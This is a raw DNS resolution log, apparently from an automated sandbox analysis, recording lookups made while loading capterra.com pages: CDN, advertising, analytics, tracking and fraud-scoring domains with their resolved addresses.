                                                                                                                                                                                                        Aug 30, 2024 18:16:49.871030092 CEST1.1.1.1192.168.2.50xbf9dNo error (0)cdn.cookielaw.org104.18.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.871030092 CEST1.1.1.1192.168.2.50xbf9dNo error (0)cdn.cookielaw.org104.18.87.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.871109009 CEST1.1.1.1192.168.2.50x4b53No error (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.081927061 CEST1.1.1.1192.168.2.50xde3dNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.081927061 CEST1.1.1.1192.168.2.50xde3dNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.081927061 CEST1.1.1.1192.168.2.50xde3dNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.081927061 CEST1.1.1.1192.168.2.50xde3dNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.081927061 CEST1.1.1.1192.168.2.50xde3dNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.082604885 CEST1.1.1.1192.168.2.50x4463No error (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.083791018 CEST1.1.1.1192.168.2.50x1dc9No error (0)geolocation.onetrust.com104.18.32.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.083791018 CEST1.1.1.1192.168.2.50x1dc9No error (0)geolocation.onetrust.com172.64.155.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.083977938 CEST1.1.1.1192.168.2.50xe82bNo error (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.239473104 CEST1.1.1.1192.168.2.50xc0b7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.240006924 CEST1.1.1.1192.168.2.50xfc09No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.422133923 CEST1.1.1.1192.168.2.50xab55No error (0)ad.doubleclick.net216.58.206.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.422158957 CEST1.1.1.1192.168.2.50xc428No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.423849106 CEST1.1.1.1192.168.2.50xd696No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.423994064 CEST1.1.1.1192.168.2.50x67fNo error (0)googleads.g.doubleclick.net142.250.186.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.437582970 CEST1.1.1.1192.168.2.50xc1e3No error (0)forms-as-a-service.capterra.comd2vtt4oircqqvk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.440386057 CEST1.1.1.1192.168.2.50xd193No error (0)forms-as-a-service.capterra.comd2vtt4oircqqvk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.440386057 CEST1.1.1.1192.168.2.50xd193No error (0)d2vtt4oircqqvk.cloudfront.net13.224.103.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.440386057 CEST1.1.1.1192.168.2.50xd193No error (0)d2vtt4oircqqvk.cloudfront.net13.224.103.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.440386057 CEST1.1.1.1192.168.2.50xd193No error (0)d2vtt4oircqqvk.cloudfront.net13.224.103.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.440386057 CEST1.1.1.1192.168.2.50xd193No error (0)d2vtt4oircqqvk.cloudfront.net13.224.103.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.247796059 CEST1.1.1.1192.168.2.50x4e83No error (0)adservice.google.com142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.247807980 CEST1.1.1.1192.168.2.50xd159No error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.368657112 CEST1.1.1.1192.168.2.50x21a4No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.369026899 CEST1.1.1.1192.168.2.50xa040No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.618913889 CEST1.1.1.1192.168.2.50xf76cNo error (0)reviews.capterra.com13.227.219.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.618913889 CEST1.1.1.1192.168.2.50xf76cNo error (0)reviews.capterra.com13.227.219.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.618913889 CEST1.1.1.1192.168.2.50xf76cNo error (0)reviews.capterra.com13.227.219.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.618913889 CEST1.1.1.1192.168.2.50xf76cNo error (0)reviews.capterra.com13.227.219.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:52.213723898 CEST1.1.1.1192.168.2.50x9ecfNo error (0)adservice.google.com142.250.185.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:52.215265989 CEST1.1.1.1192.168.2.50x68e4No error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.058429956 CEST1.1.1.1192.168.2.50x4f66No error (0)reviews.capterra.com13.227.219.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.058429956 CEST1.1.1.1192.168.2.50x4f66No error (0)reviews.capterra.com13.227.219.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.058429956 CEST1.1.1.1192.168.2.50x4f66No error (0)reviews.capterra.com13.227.219.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.058429956 CEST1.1.1.1192.168.2.50x4f66No error (0)reviews.capterra.com13.227.219.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.006058931 CEST1.1.1.1192.168.2.50x66e0No error (0)browser-intake-datadoghq.com3.233.158.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.006058931 CEST1.1.1.1192.168.2.50x66e0No error (0)browser-intake-datadoghq.com3.233.158.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.006058931 CEST1.1.1.1192.168.2.50x66e0No error (0)browser-intake-datadoghq.com3.233.158.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.021908045 CEST1.1.1.1192.168.2.50xb6a0No error (0)www.ipqualityscore.com172.67.72.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.021908045 CEST1.1.1.1192.168.2.50xb6a0No error (0)www.ipqualityscore.com104.26.3.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.021908045 CEST1.1.1.1192.168.2.50xb6a0No error (0)www.ipqualityscore.com104.26.2.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.025317907 CEST1.1.1.1192.168.2.50x7940No error (0)device.maxmind.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.025341034 CEST1.1.1.1192.168.2.50x30bbNo error (0)device.maxmind.com162.159.134.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.025341034 CEST1.1.1.1192.168.2.50x30bbNo error (0)device.maxmind.com162.159.135.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.027774096 CEST1.1.1.1192.168.2.50x61efNo error (0)www.ipqualityscore.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:02.177731991 CEST1.1.1.1192.168.2.50x5c6aNo error (0)device.maxmind.com162.159.134.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:02.177731991 CEST1.1.1.1192.168.2.50x5c6aNo error (0)device.maxmind.com162.159.135.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:02.178056955 CEST1.1.1.1192.168.2.50x4dc2No error (0)device.maxmind.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.125098944 CEST1.1.1.1192.168.2.50xebdNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.320991039 CEST1.1.1.1192.168.2.50xded1No error (0)d-ipv6.mmapiws.com104.18.34.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.320991039 CEST1.1.1.1192.168.2.50xded1No error (0)d-ipv6.mmapiws.com172.64.153.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.321960926 CEST1.1.1.1192.168.2.50x594aNo error (0)d-ipv6.mmapiws.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:06.237401009 CEST1.1.1.1192.168.2.50x9441No error (0)d-ipv6.mmapiws.com172.64.153.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:06.237401009 CEST1.1.1.1192.168.2.50x9441No error (0)d-ipv6.mmapiws.com104.18.34.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:06.238903999 CEST1.1.1.1192.168.2.50x3e05No error (0)d-ipv6.mmapiws.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.458208084 CEST1.1.1.1192.168.2.50xa0f5No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.459450960 CEST1.1.1.1192.168.2.50x2e50No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.472388983 CEST1.1.1.1192.168.2.50xae9cNo error (0)reveal.clearbit.com18.153.4.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.472388983 CEST1.1.1.1192.168.2.50xae9cNo error (0)reveal.clearbit.com18.158.205.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.131990910 CEST1.1.1.1192.168.2.50xe0f2No error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.131990910 CEST1.1.1.1192.168.2.50xe0f2No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.131990910 CEST1.1.1.1192.168.2.50xe0f2No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.139400959 CEST1.1.1.1192.168.2.50x1755No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.139400959 CEST1.1.1.1192.168.2.50x1755No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.140059948 CEST1.1.1.1192.168.2.50x5d51No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.140059948 CEST1.1.1.1192.168.2.50x5d51No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.140059948 CEST1.1.1.1192.168.2.50x5d51No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.165205956 CEST1.1.1.1192.168.2.50x3eb6No error (0)a.quora.coma.quora.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.165355921 CEST1.1.1.1192.168.2.50x783fNo error (0)a.quora.coma.quora.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.166033983 CEST1.1.1.1192.168.2.50xb731No error (0)img.en25.comwildcard.en25.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.166348934 CEST1.1.1.1192.168.2.50x9b11No error (0)img.en25.comwildcard.en25.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.176945925 CEST1.1.1.1192.168.2.50x660No error (0)cdn0.capterra-static.comd28mvs9821idoy.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.178352118 CEST1.1.1.1192.168.2.50xe781No error (0)cdn0.capterra-static.comd28mvs9821idoy.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.178352118 CEST1.1.1.1192.168.2.50xe781No error (0)d28mvs9821idoy.cloudfront.net18.66.102.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.178352118 CEST1.1.1.1192.168.2.50xe781No error (0)d28mvs9821idoy.cloudfront.net18.66.102.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.178352118 CEST1.1.1.1192.168.2.50xe781No error (0)d28mvs9821idoy.cloudfront.net18.66.102.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.178352118 CEST1.1.1.1192.168.2.50xe781No error (0)d28mvs9821idoy.cloudfront.net18.66.102.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.497201920 CEST1.1.1.1192.168.2.50xf787No error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.497201920 CEST1.1.1.1192.168.2.50xf787No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.497353077 CEST1.1.1.1192.168.2.50xa2a2No error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.497353077 CEST1.1.1.1192.168.2.50xa2a2No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.781961918 CEST1.1.1.1192.168.2.50xd8f0No error (0)reveal.clearbit.com18.158.205.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.781961918 CEST1.1.1.1192.168.2.50xd8f0No error (0)reveal.clearbit.com18.153.4.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.898211956 CEST1.1.1.1192.168.2.50x6d32No error (0)a.quora.coma.quora.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.899890900 CEST1.1.1.1192.168.2.50x2f49No error (0)a.quora.coma.quora.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.924937010 CEST1.1.1.1192.168.2.50x8de3No error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.924937010 CEST1.1.1.1192.168.2.50x8de3No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.924937010 CEST1.1.1.1192.168.2.50x8de3No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.185806990 CEST1.1.1.1192.168.2.50x496cNo error (0)img.en25.comwildcard.en25.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.186475992 CEST1.1.1.1192.168.2.50x35c5No error (0)img.en25.comwildcard.en25.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.216905117 CEST1.1.1.1192.168.2.50xa9d5No error (0)c.lytics.io172.67.73.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.216905117 CEST1.1.1.1192.168.2.50xa9d5No error (0)c.lytics.io104.26.2.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.216905117 CEST1.1.1.1192.168.2.50xa9d5No error (0)c.lytics.io104.26.3.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.217587948 CEST1.1.1.1192.168.2.50x3ddfNo error (0)c.lytics.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.219083071 CEST1.1.1.1192.168.2.50x365fNo error (0)q.quora.com52.5.177.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.219083071 CEST1.1.1.1192.168.2.50x365fNo error (0)q.quora.com52.55.145.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.219083071 CEST1.1.1.1192.168.2.50x365fNo error (0)q.quora.com52.22.68.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.219083071 CEST1.1.1.1192.168.2.50x365fNo error (0)q.quora.com52.70.11.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396688938 CEST1.1.1.1192.168.2.50xedf2No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396688938 CEST1.1.1.1192.168.2.50xedf2No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396688938 CEST1.1.1.1192.168.2.50xedf2No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.85.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.44.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.215.138.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.33.187.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.228.186.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.127.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.60.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.396703005 CEST1.1.1.1192.168.2.50xef2aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.19.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.401957035 CEST1.1.1.1192.168.2.50x1962No error (0)cdn0.capterra-static.comd28mvs9821idoy.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.401957035 CEST1.1.1.1192.168.2.50x1962No error (0)d28mvs9821idoy.cloudfront.net18.239.94.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.401957035 CEST1.1.1.1192.168.2.50x1962No error (0)d28mvs9821idoy.cloudfront.net18.239.94.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.401957035 CEST1.1.1.1192.168.2.50x1962No error (0)d28mvs9821idoy.cloudfront.net18.239.94.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.401957035 CEST1.1.1.1192.168.2.50x1962No error (0)d28mvs9821idoy.cloudfront.net18.239.94.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.410968065 CEST1.1.1.1192.168.2.50x5928No error (0)cdn0.capterra-static.comd28mvs9821idoy.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.452662945 CEST1.1.1.1192.168.2.50x28c4No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.452662945 CEST1.1.1.1192.168.2.50x28c4No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.452662945 CEST1.1.1.1192.168.2.50x28c4No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.452778101 CEST1.1.1.1192.168.2.50xc4d8No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.452778101 CEST1.1.1.1192.168.2.50xc4d8No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.971976995 CEST1.1.1.1192.168.2.50x9f21No error (0)tracking.capterra.coms68275882.t.eloqua.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.971976995 CEST1.1.1.1192.168.2.50x9f21No error (0)s68275882.t.eloqua.comp04e.t.eloqua.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.033924103 CEST1.1.1.1192.168.2.50xc517No error (0)c.lytics.io104.26.3.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.033924103 CEST1.1.1.1192.168.2.50xc517No error (0)c.lytics.io172.67.73.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.033924103 CEST1.1.1.1192.168.2.50xc517No error (0)c.lytics.io104.26.2.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.037631035 CEST1.1.1.1192.168.2.50x756eNo error (0)c.lytics.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.105808973 CEST1.1.1.1192.168.2.50x53d7No error (0)q.quora.com52.22.68.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.105808973 CEST1.1.1.1192.168.2.50x53d7No error (0)q.quora.com52.55.145.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.105808973 CEST1.1.1.1192.168.2.50x53d7No error (0)q.quora.com52.70.11.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.105808973 CEST1.1.1.1192.168.2.50x53d7No error (0)q.quora.com52.5.177.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.228.154.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.129.9.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.44.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.253.116.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.228.186.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.33.187.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.127.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335524082 CEST1.1.1.1192.168.2.50x71efNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.85.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335609913 CEST1.1.1.1192.168.2.50x9c69No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335609913 CEST1.1.1.1192.168.2.50x9c69No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.335609913 CEST1.1.1.1192.168.2.50x9c69No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.346165895 CEST1.1.1.1192.168.2.50xdcdNo error (0)evantaagartnercompany.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.346165895 CEST1.1.1.1192.168.2.50xdcdNo error (0)gslb-2.demdex.netedge-usw2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.346165895 CEST1.1.1.1192.168.2.50xdcdNo error (0)edge-usw2.demdex.netdcs-public-edge-usw2-219535174.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
